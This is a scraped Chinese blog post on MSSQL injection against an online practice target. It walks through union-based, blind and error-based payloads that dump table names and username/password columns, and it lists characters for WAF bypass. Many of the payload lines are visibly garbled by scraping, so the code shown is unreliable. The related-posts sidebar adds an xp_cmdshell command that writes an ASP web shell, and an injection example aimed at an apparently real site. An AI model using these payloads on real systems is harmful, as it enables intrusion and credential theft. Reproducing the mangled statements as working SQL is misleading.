mysql c语言 sql注入,mssql注入与绕过

于 2021-03-17 02:36:52 发布
阅读量175 收藏
点赞数
文章标签: mysql c语言 sql注入

搜索热词

0x00   前言

上篇文章写了mssql的查询方式与mssql 和MysqL的区别。在注入当中也是有些区别的。下面直接来看到几种mssql注入的方法与特性,绕过方式。因为mssql加aspx的站懒得搭建,所以这里直接拿墨者的在线靶机做测试。

0x01    mssql 联合查询

这里输入单引号报错了 ,初步判断存在注入。

and 1=1 正常and2 报错

这里再来猜字段

order by 10报错

order by5报错

order by4 正常

那么他的字段就是4位。

知道字段后我们再来对他进行联合查询。

and 1=2 union select null,null 报错

这里要采用null的方式来占位,因为mssql数据库是个强类型的数据库,对数据格式比较严格。

这里报错了 ,可能是union select 函数被禁用了

and 2 union all null

1707a1fb6a983d7d955b9d158b421192.png

没报错但是没回显数据

and select 'null,null,null

and null',1)">null'

85a6d8c3bff15be54348d5e69f33158a.png

一个一个加单引号括起来,查看类型

在第二和第三位置是可以回显数据的,我们就在 二和三的位置来查询数据

and null

e6014fd6f48eab5cea439c4f60527c21.png

查询版本为2005的版本, 能正常查询,这时候就可以去爆我们的数据。

先来查询他的数据库名

and 查看当前数据库

and1),1)"> 查看第一个数据库

and 2),1)"> 查看第二个数据库

and 3),1)"> 查看第三个数据库

and 4),1)"> 查看第四个数据库

and 5),1)"> 查看第五个数据库

and 6),1)">null 查询失败

那么这里,就可以去爆出他的数据库这里的数据库是5个数据库

63bf4b80a87ecf05eb9ce5febd55eb6c.png

这也是个MysqL不一样的地方,可以直接输入db_name ()里面添加参数,直接遍历数据库名。

直接查询mozhe_db_v2这个数据库的表名

and select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype =u'),1)">null

014185809af2db03c9b54f976c5c2bc1.png

top是取值 ,查询到的第一行数据,那么如果我们想爆第二表呢,在mssql里面没有 limit这个函数。

xtpye ='u' 这个是我们指定查询的条件,查询他自定义的表

-' and name <>(manage')),1)">null

37a76b0a341fcb345c8dca293d77f326.png

这里直接指定查询条件为name 不等于manage 然后爆出他的第二张表  如果后面还需要查询的话也是同样的方式。

union all ') and name<>(announcementnull

这里查询不回显,那么说明他这就2张表。

既然我们现在知道了表后就可以直接来爆字段了

union all 1 col_name(object_id(1)from sysobjects),1)">null

union all select null,(select top 1 col_name(object_id('manage'),2)from sysobjects),null

union all select null,3)from sysobjects),null

分别显示了 id ,username ,password 。

column_id列的标识号。 column_id 自变量具有一个 int 数据类型 。

该函数会返回指定对象的ID值,可以在sysobjects表中进行验证。

union all 1 username from manage),1)">

union all 1 password null

acdc6dd029f03cfabec18a0db79905d1.png

直接爆出数据。这个是我们的简单联合的注入方式。

0x02    mssql 盲注

这里来直接给出语句和我们的MysqL差不多,

猜表

AND SELECT SUBSTRING(table_name,1)">1,1)">1) FROM information_schema.tables = A'

用取值函数来取information_schema.table 里面的值,这个数据库在我们mssql中是个视图,而不是真正的数据库。

AND SELECT SUBSTRING(column_name,1)">1) FROM information_schema.columns = '

0x03   mssql 报错注入

在mssql注入里面,我们常常会利用报错注入来爆出数据,这个报错注入基本基于类型转换上的错误进行报错注入。

注入语句:

AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables)

如果想查询第二张表的话可以利用到前面的方式 name不等于 第一张表

AND 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables))

这里和前面说到的差不多,这个的意思是查询第一条数据 然后不在第一张表里面查询,那么就可以爆出我们的第二张表。想爆第三张表也是一样。

AND 2 table_name FROM information_schema.tables))

不在前面2张表进行查询。 那么查询第一行数据就是第三表的数据。

0x04   mssql 特性

可替代空格字符的字符:

01Start of Heading02Start of Text03End of Text04End of Transmission05Enquiry06Acknowledge07Bell08Backspace09Horizontal Tab

0A New Line

0B Vertical Tab

0C New Page

0D Carriage Return

0E Shift Out

0F Shift InData Link Escape11 Device Control 1

12 Device Control 2

13 Device Control 3

14 Device Control 4

15Negative Acknowledge16Synchronous Idle17End of Transmission Block18Cancel19End of Medium

1A Substitute

1B Escape

1C File Separator

1D Group Separator

1E Record Separator

1F Unit Separator20Space25 %

and 和or 后的中间替代字符

01-范围21!

2B+2D--2E 。

5C \

7E 〜

mssql 注释方式:

/**/    c语言注释

--    sql注释

;%00

在绕waf当中会频繁用到这些注释方式,也会用到各种特殊字符来绕过waf,mssql可替代空格的字符比MysqL多出不少,在外面绕过waf当中会有很大的帮助。

0x03   结尾

本次文章耗时 2小时。记录快乐时刻。

22b9df6cf96c2e42da0c646666ef6a54.png

9a46fefe8466fe4c37f320e9123f3840.gif

总结

以上是编程之家为你收集整理的mssql注入与绕过全部内容,希望文章能够帮你解决mssql注入与绕过所遇到的程序开发问题。

如果觉得编程之家网站内容还不错,欢迎将编程之家网站推荐给程序员好友。

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。

拉条皮的大顾
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql手工注入绕过防火墙_mssql手工注入及绕过
weixin_39710288的博客
02-06 116
例子:http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1【1】首先爆版本:http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and @@version>0报错信息:在将 nvarchar 值 'Microsoft SQL Server 2008 R2 (RTM) - 10.50.16...
c语言sql注入,最详细的SQL注入语句
weixin_35985162的博客
05-24 829
最详细的SQL注入语句相关的命令整理1、 用^转义字符来写ASP(一句话木马)文件的方法: http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^execute request^("l"^)^ >c:\mu.asp';-- echo ^ >c:\mu.asp2、...
mysql c语言 sql注入_【注入攻击】SQL注入(不完整总结)
weixin_39886251的博客
01-20 295
注入攻击数据与代码分离,可以说是专门为解决注入攻击而生的注入攻击的本质:用户输入的数据当作代码执行两个关键条件:一、用户能够控制输入;二、原本程序要执行的代码,拼接了用户输入的数据1 SQL注入典例:var ShipCity;ShipCity = Request.form(“ShipCity”);var sql = “select * from OrdersTable where ShipCity...
mysql 自带防注入_MySQL 及 SQL 注入与防范方法
weixin_39942397的博客
02-18 239
所谓sql注入,就是通过把sql命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的sql命令。我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。1.以下实例中,输入的用户名必须为字母、数字及下划线的组合,且用户名长度为 8 到 20 个字符之间:PHP;">if (preg_match("/^\w{...
mysql特有的特性绕过_通用的关于sql注入绕过技巧(利用mysql的特性)
weixin_39978696的博客
01-21 200
1直接上语法2select*fromuserswhereid=8E0unionselect1,2,3,4,5,6,7,8,9,03select*fromuserswhereid=8.0unionselect1,2,3,4,5,6,7,8,9,04select*fromuserswhereid=\Nunionselect1,2,3,4,5,6,7,8...
PHP+MysqlSQL注入源码 下载
04-25
PHP+MysqlSQL注入源码、下载解压部署到环境中去就行了。 PHP+MysqlSQL注入源码、下载解压部署到环境中去就行了。
MySQL 及 SQL 注入与防范方法
09-10
本文将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符。解决SQL注入安全的问题解决,希望对大家有所帮助。
MySQL 及 SQL 注入
12-16
MySQL 及 SQL 注入 如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符。 所谓SQL注入,就是...
MySQL解决SQL注入的另类方法详解
09-10
主要介绍了MySQL解决SQL注入的另类方法,结合实例形式列举分析了几种防止SQL注入的技巧,具有一定参考借鉴价值,需要的朋友可以参考下
SQL注入
weixin_30293079的博客
02-23 106
SQL注入语句五例 SQL注入语句是SQL语言中非常重要的部分,下面为您介绍的是SQL注入语句的5个例子,供您参考,如果您感兴趣的话,不妨一看。 SQL注入语句是学习SQL语句过程中需要掌握的知识,下面就为您介绍5个标准的SQL注入语句,希望对您了解SQL注入语句有所帮助。 1.判断有无注入点 ;and11=1and1=2 2.猜表一般的表的名称无非是adm...
C语言MySQL操作
12-22
a) ODBC简介。ODBC是微软提供的访问数据库的一种标准接口,通过ODBC可以连接MSSQLServer、MYSQL、DB2、Oracle、Access等各种数据库,通过统一的函数进行访问,也就是访问各种数据库都可以使用统一的函数。屏蔽了连接不同数据库的差异性。 b) 除了ODBC之外还有ADO、ADO.net等,Java中有JDBC等。都有连接、结果集、游标、事务、参数化SQL等概念,一通百通。
Linux下C访问MSSQL2000实例
01-03
在linux下使用C开发通过ODBC访问win主机MSSQL的实例,带说明和ODBC安装包
SQL注入以及防注入代码
05-15
SQL注入以及防注入代码
Linux使用C语言链接MsSQL
weixin_30284355的博客
03-05 157
1.安装gcc编译器 yum install gcc 2.下载freetds wget ftp://ftp.freetds.org/pub/freetds/stable/freetds-patched.tar.gz 3.安装 tar xzf freetds-patched.tar.gz ./configure --with-tdsver=7.4 --enable-m...
c/c++待续动态内存及SQL注入
那一片天的专栏
12-24 1135
SQL攻击,不是利用操作系统的BUG实现攻击,而是利用程序员的疏忽,通过SQL语句,实现无账号登陆,甚至篡改数据库       常见的内存错误及其对策   1 内存未分配成功却使用了它(accert判空)   2 内存分配虽然成功,但尚未初始化就引用它(错误原因:一是没有初始化的概念;二是以为初始化全为零,导致引用错误(例如数组))   3内存分配成功并且已经初始化,但操作
c mssql mysql_mssql与mysql 数据迁移
weixin_39770506的博客
01-18 70
概要:mssql向mysql迁移的实例,所要用到的工具bcp和load data local infile。由于订单记录的数据是存放在mssql服务器上的,而项目需求把数据迁移到mysql server,存在的问题mssql和mysql订单表结构不同,所以不能直接导入到mysql中的订单表里面。解决思路,首先,在mysql数据库新建一张与mssql中订单表结构一样的表,在mssql上利用bcp工具...
c mssql mysql_实例演示在MSSQL中启用全文检索_mysql
weixin_39653766的博客
01-26 102
如何在SQL中启用全文检索功能?本文将通过实例向你剖折这个问题。这是一个全文索引的一个例子,首先在查询分析器中使用:www.c hinaitpower.coml1odLWyQuse pubsgo www.c hinaitpower.coml1odLWyQ--打开数据库全文索引的支持www.c hinaitpower.coml1odLWyQexecute sp_fulltext_database '...
SQL注入攻击
SDULKP的博客
05-12 419
      所谓SQL注入,就是通过把SQL命令插入到Web表单或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令的行为。具体来说,它是利用现有程序,将恶意SQL命令注入到后台数据库引擎执行的能力。它可以通过在Web表单中输入恶意的SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者的意图去执行SQL语句。一、注入原理       SQL注入攻击通过构建特殊的输入作...
SQL注入学习笔记(一)
qq_37074040的博客
07-25 427
空格是%20,单引号是%27, 井号是%23,双引号是%22 //常见urlencode order by 3 //猜字段个数 select 1, 2, 3 //增加临时列 mysqli_fetch_arr
sql注入绕过 磐云题
最新发布
08-26
- *1* *2* *3* [SQL 注入绕过(一)](https://blog.csdn.net/weixin_51730169/article/details/125417024)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值